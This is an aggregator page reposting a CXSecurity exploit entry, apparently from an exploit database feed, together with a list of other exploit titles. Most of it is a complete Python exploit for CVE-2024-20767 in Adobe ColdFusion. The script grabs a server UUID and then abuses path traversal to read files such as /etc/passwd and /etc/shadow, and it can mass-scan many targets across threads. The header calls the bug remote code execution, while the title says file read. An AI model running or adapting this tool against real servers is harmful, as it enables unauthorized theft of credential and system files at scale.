惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

WordPress大学
WordPress大学
Cyberwarzone
Cyberwarzone
The GitHub Blog
The GitHub Blog
云风的 BLOG
云风的 BLOG
P
Proofpoint News Feed
小众软件
小众软件
Recent Announcements
Recent Announcements
博客园 - 三生石上(FineUI控件)
Security Archives - TechRepublic
Security Archives - TechRepublic
W
WeLiveSecurity
Cloudbric
Cloudbric
博客园 - 司徒正美
美团技术团队
N
News and Events Feed by Topic
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
PCI Perspectives
PCI Perspectives
宝玉的分享
宝玉的分享
H
Help Net Security
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Google DeepMind News
Google DeepMind News
Help Net Security
Help Net Security
Last Week in AI
Last Week in AI
S
Schneier on Security
N
News | PayPal Newsroom
B
Blog RSS Feed
L
LINUX DO - 最新话题
T
Troy Hunt's Blog
S
Secure Thoughts
雷峰网
雷峰网
aimingoo的专栏
aimingoo的专栏
L
Lohrmann on Cybersecurity
G
Google Developers Blog
Microsoft Azure Blog
Microsoft Azure Blog
Hacker News - Newest:
Hacker News - Newest: "LLM"
T
Tenable Blog
S
Securelist
L
LangChain Blog
Recent Commits to openclaw:main
Recent Commits to openclaw:main
I
InfoQ
H
Heimdal Security Blog
Cisco Talos Blog
Cisco Talos Blog
F
Full Disclosure
Y
Y Combinator Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
K
Kaspersky official blog
T
Tailwind CSS Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
阮一峰的网络日志
阮一峰的网络日志
C
Cisco Blogs

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Adobe ColdFusion 2023.6 Remote File Read
2025-07-28 · via The Exploit Database - CXSecurity.com

Adobe ColdFusion 2023.6 Remote File Read

# Exploit Title: Adobe ColdFusion 2023.6 - Remote File Read # Exploit Author: @İbrahimsql # Exploit Author's github: https://github.com/ibrahmsql # Description: ColdFusion 2023 (LUcee) - Remote Code Execution # CVE: CVE-2024-20767 # Vendor Homepage: https://www.adobe.com/ # Requirements: requests>=2.25.0, urllib3>=1.26.0 # Usage: python3 CVE-2024-20767.py -u http://target.com -f /etc/passwd #!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import re import urllib3 import requests import argparse from urllib.parse import urlparse from concurrent.futures import ThreadPoolExecutor, as_completed urllib3.disable_warnings() class ColdFusionExploit: def __init__(self, output_file=None, port=8500): self.output_file = output_file self.port = port self.verbose = True self.session = requests.Session() def print_status(self, message, status="*"): colors = {"+": "\033[92m", "-": "\033[91m", "*": "\033[94m", "!": "\033[93m"} reset = "\033[0m" print(f"{colors.get(status, '')}{status} {message}{reset}") def normalize_url(self, url): if not url.startswith(('http://', 'https://')): url = f"http://{url}" parsed = urlparse(url) if not parsed.port: url = f"{url}:{self.port}" return url.rstrip('/') def get_uuid(self, url): endpoint = "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat" try: response = self.session.get(f"{url}{endpoint}", verify=False, timeout=10) if response.status_code == 200: match = re.search(r"<var name='uuid'><string>(.+?)</string></var>", response.text) if match: uuid = match.group(1) if self.verbose: self.print_status(f"UUID: {uuid[:8]}...", "+") return uuid except Exception as e: if self.verbose: self.print_status(f"Error: {e}", "-") return None def read_file(self, url, uuid, file_path): headers = {"uuid": uuid} endpoint = f"/pms?module=logging&file_name=../../../../../../../{file_path}&number_of_lines=100" try: response = self.session.get(f"{url}{endpoint}", verify=False, headers=headers, timeout=10) if response.status_code == 200 and response.text.strip() != "[]": return response.text except: pass return None def test_files(self, url, uuid): files = { "Linux": ["etc/passwd", "etc/shadow", "etc/hosts"], "Windows": ["Windows/win.ini", "Windows/System32/drivers/etc/hosts", "boot.ini"] } for os_name, file_list in files.items(): for file_path in file_list: content = self.read_file(url, uuid, file_path) if content: self.print_status(f"VULNERABLE: {url} - {os_name} - {file_path}", "+") if self.verbose: print(content[:200] + "..." if len(content) > 200 else content) print("-" * 50) if self.output_file: with open(self.output_file, "a") as f: f.write(f"{url} - {os_name} - {file_path}\n") return True return False def exploit_custom_file(self, url, uuid, custom_file): content = self.read_file(url, uuid, custom_file) if content: self.print_status(f"File read: {custom_file}", "+") print(content) return True else: self.print_status(f"Failed to read: {custom_file}", "-") return False def exploit(self, url, custom_file=None): url = self.normalize_url(url) if self.verbose: self.print_status(f"Testing: {url}") uuid = self.get_uuid(url) if not uuid: if self.verbose: self.print_status(f"No UUID: {url}", "-") return False if custom_file: return self.exploit_custom_file(url, uuid, custom_file) else: return self.test_files(url, uuid) def scan_file(self, target_file, threads): if not os.path.exists(target_file): self.print_status(f"File not found: {target_file}", "-") return with open(target_file, "r") as f: urls = [line.strip() for line in f if line.strip() and not line.startswith('#')] self.print_status(f"Scanning {len(urls)} targets with {threads} threads") self.verbose = False vulnerable = 0 with ThreadPoolExecutor(max_workers=threads) as executor: futures = {executor.submit(self.exploit, url): url for url in urls} for future in as_completed(futures): url = futures[future] try: if future.result(): vulnerable += 1 print(f"[+] {url}") else: print(f"[-] {url}") except Exception as e: print(f"[!] {url} - Error: {e}") self.print_status(f"Scan complete: {vulnerable}/{len(urls)} vulnerable", "+") def main(): parser = argparse.ArgumentParser(description="ColdFusion CVE-2024-20767 Exploit") parser.add_argument("-u", "--url", help="Target URL") parser.add_argument("-f", "--file", help="File with target URLs") parser.add_argument("-p", "--port", type=int, default=8500, help="Port (default: 8500)") parser.add_argument("-c", "--custom", help="Custom file to read") parser.add_argument("-o", "--output", help="Output file") parser.add_argument("-t", "--threads", type=int, default=20, help="Threads (default: 20)") parser.add_argument("-q", "--quiet", action="store_true", help="Quiet mode") args = parser.parse_args() if not args.url and not args.file: parser.print_help() return exploit = ColdFusionExploit(args.output, args.port) exploit.verbose = not args.quiet if args.url: exploit.exploit(args.url, args.custom) elif args.file: exploit.scan_file(args.file, args.threads) if __name__ == "__main__": main()



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}